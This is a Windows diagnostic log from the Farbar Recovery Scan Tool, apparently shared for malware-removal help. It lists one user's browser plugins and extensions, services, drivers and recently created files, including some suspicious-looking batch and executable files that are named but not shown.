FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: (RealDownloader) - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-11-24] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{338950EA-82DB-44C1-930D-0C28E023C9F0}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi
FF Extension: (KeepVid Pro) - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi [2017-09-02] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @ASC/FileLabPlugin;version=1.1.33 -> C:\ProgramData\FileLab\Plugin\Framework\npFlPluginS.dll [2012-02-20] (Ascensio System SIA -> FileLab) [File not signed]
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll [2017-11-21] (DivX, LLC -> DivX, LLC)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nokia.com/EnablerPlugin -> C:\Program Files (x86)\Nokia\Nokia Suite\npNokiaSuiteEnabler.dll [2014-11-19] (Nokia ->  )
FF Plugin-x32: @real.com/nppl3260;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.15 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2015-02-06] (RealNetworks, Inc. -> RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-08-02] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Vladana\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-02-20] (Unity Technologies ApS -> Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: pokki.com/PokkiDownloadHelper -> C:\Users\Vladana\AppData\Local\Pokki\Download Helper\npPokkiDownloadHelper.1.2.0.78.dll [No File]
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: torrents-time.com/TTPlugin -> C:\Program Files (x86)\TorrentsTime Media Player\bin\npTTPlugin.dll [No File]
 
Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> hxxps://www.google.com/webhp?complete=0&hl=en
CHR StartupUrls: Profile 1 -> "chrome://apps/"
CHR NewTab: Profile 1 ->  Not-active:"chrome-extension://eedlgdlajadkbbjoobobefphmfkcchfk/newtab.html"
CHR DefaultSearchURL: Profile 1 -> hxxps://www.ecosia.org/search?q={searchTerms}&addon=chrome&addonversion=2.1.0
CHR DefaultSearchKeyword: Profile 1 -> ecosia
CHR DefaultSuggestURL: Profile 1 -> hxxps://ac.ecosia.org/?q={searchTerms}&type=list&mkt=en_US
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-09-06]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-11-18]
CHR Extension: (Slides) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-09-06]
CHR Extension: (Docs) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-09-06]
CHR Extension: (Google Drive) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-17]
CHR Extension: (Video Progress Bar & Controls for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bhdahocbinakfolafliljfkgkdeemgcd [2019-01-07]
CHR Extension: (YouTube) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-09-06]
CHR Extension: (Facebook) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\boeajhmfdjldchidhphikilcgdacljfm [2018-09-06]
CHR Extension: (Chrome IG Story) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bojgejgifofondahckoaahkilneffhmf [2019-02-16]
CHR Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2019-10-30]
CHR Extension: (Disable automatic tab discarding) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\dnhngfnfolbmhgealdpolmhimnoliiok [2019-09-26]
CHR Extension: (Ecosia Search) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\eedlgdlajadkbbjoobobefphmfkcchfk [2019-10-10]
CHR Extension: (Adobe Acrobat) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-09-26]
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2019-10-05]
CHR Extension: (Sheets) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-09-06]
CHR Extension: (Skyload - Music and video downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fnmpfimijcopbiaiobinamadmnmhckmp [2019-08-23]
CHR Extension: (Emojis - Emoji Keyboard) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gaoflciahikhligngeccdecgfjngejlh [2019-11-02]
CHR Extension: (Google Docs Offline) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (Super Auto Refresh Plus) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\globgafddkdlnalejlkcpaefakkhkdoa [2019-10-19]
CHR Extension: (Stream Video Downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-15]
CHR Extension: (GoodTwitter) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jbanhionoclikdjnjlcmefiofgjimgca [2019-10-05]
CHR Extension: (Penzu) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\khgpedpfmjojllfmmhfabemdelhncneo [2018-09-06]
CHR Extension: (Google Hangouts) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\knipolnnllmklapflnccelgolnpehhpl [2019-05-23]
CHR Extension: (Google Maps) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2018-09-06]
CHR Extension: (Twitter Video Downloader | Fast and Free) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nbkknbagklenkcienihfapbfpjemnfoi [2019-10-28]
CHR Extension: (IG Stories for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilbfjdbacfdodpbdondbbkmoigehodg [2019-10-15]
CHR Extension: (Slinky Modern) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilnodhmmonndffbejancdeiggflcehi [2018-09-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-05]
CHR Extension: (Spotify Music Dwnloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\oefdcdmhklplgdmendjfnjeiijgcmabi [2019-01-25]
CHR Extension: (Gmail) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-30]
CHR Extension: (Chrome Media Router) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-10-24]
CHR Extension: (RightToCopy) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\plmcimdddlobkphnofejmeidjblideca [2018-12-02]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\System Profile [2018-09-06]
CHR HKU\S-1-5-21-7682389-3612777877-391866582-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [jbolfgndggfhhpbnkgnpjkfhinclbigj] - <no Path/update_url>
 
Opera: 
=======
OPR DownloadDir: C:\Users\Vladana\Desktop
OPR StartupUrls: "hxxps://www.google.rs/webhp?complete=0&hl=en&gws_rd=cr&ei=2SN4VYC0FIHbsgHZ8IDQCA"
OPR Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\filddmgeklidnenaibigmjeopkaccljm [2019-06-13]
OPR Extension: (Flash Video Downloader (FVD)) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\neacgcjokggofibnbfapeaejhclmpple [2018-09-09]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6085360 2019-10-04] (AVAST Software s.r.o. -> AVAST Software)
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [225280 2011-08-05] (Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc)
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [81280 2019-10-25] (Mixbyte Inc -> Freemake)
R2 FUJ02E3Service; C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
S2 hshld; C:\Program Files (x86)\Hotspot Shield\bin\cmw_srv.exe [192384 2019-11-04] (AnchorFree Inc -> AnchorFree Inc.)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation -> Intel Corporation)
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273168 2012-04-17] (Intel Corporation-Mobile Wireless Group -> )
R3 NMIndexingService; C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexingService.exe [382248 2007-09-20] (Nero AG -> Nero AG)
R2 PFNService; C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe [2213376 2011-12-22] (FUJITSU LIMITED) [File not signed]
R2 PowerSavingUtilityService; C:\Program Files\Fujitsu\PSUtility\PSUService.exe [51608 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-10-26] (RealNetworks, Inc. -> )
S4 RealPlayer Cloud Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1141848 2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
S4 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [31856 2014-10-30] (RealNetworks, Inc. -> )
R2 Update service; C:\Program Files (x86)\Popcorn Time\Updater.exe [339968 2015-10-19] (Popcorn Time) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292480 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [2671376 2012-04-17] (Intel Corporation-Mobile Wireless Group -> Intel® Corporation)
S3 WsDrvInst; C:\Program Files (x86)\iSkysoft\iSkysoft iTransfer\DriverInstall.exe [X]
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AMPPAL; C:\Windows\System32\DRIVERS\AMPPAL.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
S3 AMPPALP; C:\Windows\System32\DRIVERS\amppal.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [37616 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [204824 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [274456 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [209552 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [65120 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswHdsKe; C:\Windows\System32\drivers\aswHdsKe.sys [276952 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42736 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [171520 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [110320 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [83792 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [848432 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [460448 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [236024 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [316528 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [76192 2018-03-19] (Malwarebytes Corporation -> )
R0 FBIOSDRV; C:\Windows\System32\Drivers\FBIOSDRV.sys [21104 2009-06-24] (FUJITSU LIMITED  -> FUJITSU LIMITED)
R3 FUJ02B1; C:\Windows\System32\DRIVERS\FUJ02B1.sys [7808 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R3 FUJ02E3; C:\Windows\System32\DRIVERS\FUJ02E3.sys [7296 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [193768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [112864 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [44768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253664 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [93816 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 nmwcd; C:\Windows\System32\drivers\ccdcmbx64.sys [19968 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdc; C:\Windows\System32\drivers\ccdcmbox64.sys [27136 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsucx64; C:\Windows\System32\drivers\nmwcdnsucx64.sys [12800 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsux64; C:\Windows\System32\drivers\nmwcdnsux64.sys [171008 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
S3 pccsmcfd; C:\Windows\System32\DRIVERS\pccsmcfdx64.sys [26112 2012-10-17] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1812608 2011-12-27] (Microsoft Windows Hardware Compatibility Publisher -> )
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2013-02-20] () [File not signed]
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 upperdev; C:\Windows\System32\DRIVERS\usbser_lowerfltx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 UsbserFilt; C:\Windows\System32\DRIVERS\usbser_lowerfltjx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
U3 avgbu57v; C:\Windows\System32\Drivers\avgbu57v.sys [0 0000-00-00] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U4 ekrn; no ImagePath
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) ===================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-18 14:53 - 2019-11-18 14:55 - 000047409 _____ C:\Users\Vladana\Desktop\FRST.txt
2019-11-18 14:24 - 2019-11-18 14:54 - 000000000 ____D C:\FRST
2019-11-18 14:22 - 2019-11-18 14:52 - 002260480 _____ (Farbar) C:\Users\Vladana\Desktop\FRST64.exe
2019-11-17 00:22 - 2019-11-18 14:10 - 000003370 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-17 00:22 - 2019-11-18 14:10 - 000003240 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-17 00:17 - 2019-10-21 20:51 - 000002930 _____ C:\Windows\e.bat
2019-11-17 00:17 - 2019-07-30 17:00 - 000004608 _____ () C:\Windows\e.exe
2019-11-17 00:16 - 2019-09-12 17:27 - 000025600 _____ () C:\Windows\fr.exe
2019-11-16 17:33 - 2019-11-16 17:45 - 000000000 ____D C:\Users\Vladana\AppData\Local\CrashDumps
2019-11-16 17:31 - 2019-11-16 17:46 - 000000000 ____D C:\Program Files (x86)\Avira
2019-11-16 16:54 - 2019-11-16 16:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hotspot Shield
2019-11-16 16:54 - 2019-11-16 16:54 - 000000000 ____D C:\Program Files (x86)\Hotspot Shield
2019-11-16 16:52 - 2019-11-16 16:54 - 000001028 _____ C:\Users\Public\Desktop\Hotspot Shield.lnk
2019-11-16 16:52 - 2019-11-16 16:54 - 000001028 _____ C:\ProgramData\Desktop\Hotspot Shield.lnk
2019-11-16 16:40 - 2019-11-16 16:54 - 000000000 ____D C:\ProgramData\Hotspot Shield
2019-11-16 16:39 - 2019-11-16 16:39 - 000000000 ____D C:\Users\Vladana\AppData\Local\Turbo.net
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\Wget
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\curl
2019-11-16 16:28 - 2019-10-12 19:40 - 000004608 _____ () C:\Windows\d.exe
2019-11-16 16:28 - 2019-09-12 15:16 - 000001241 _____ C:\Windows\d.bat
2019-11-16 16:28 - 2019-08-09 16:30 - 000000001 _____ C:\Windows\y.txt
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_n.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_f.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000290 _____ C:\Windows\e.reg
2019-11-16 16:21 - 2019-11-16 16:21 - 000000000 ____D C:\Users\Vladana\Documents\Visual Studio 2005
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\Users\Public\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\ProgramData\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 14:14 - 2019-11-16 14:14 - 000001216 _____ C:\Users\Vladana\Desktop\4K Video Downloader.lnk
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\4K Video Downloader
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Local\4kdownload.com
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Program Files (x86)\4KDownload
2019-11-15 19:03 - 2019-11-17 00:15 - 000000000 ____D C:\Users\Vladana\AppData\Local\ZenMate
2019-11-11 01:34 - 2019-11-18 01:34 - 000003348 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-11 01:34 - 2019-11-18 01:34 - 000003218 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-08 21:02 - 2019-11-11 01:28 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\Users\Public\Desktop\Mp3tag.lnk
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\ProgramData\Desktop\Mp3tag.lnk
 
==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
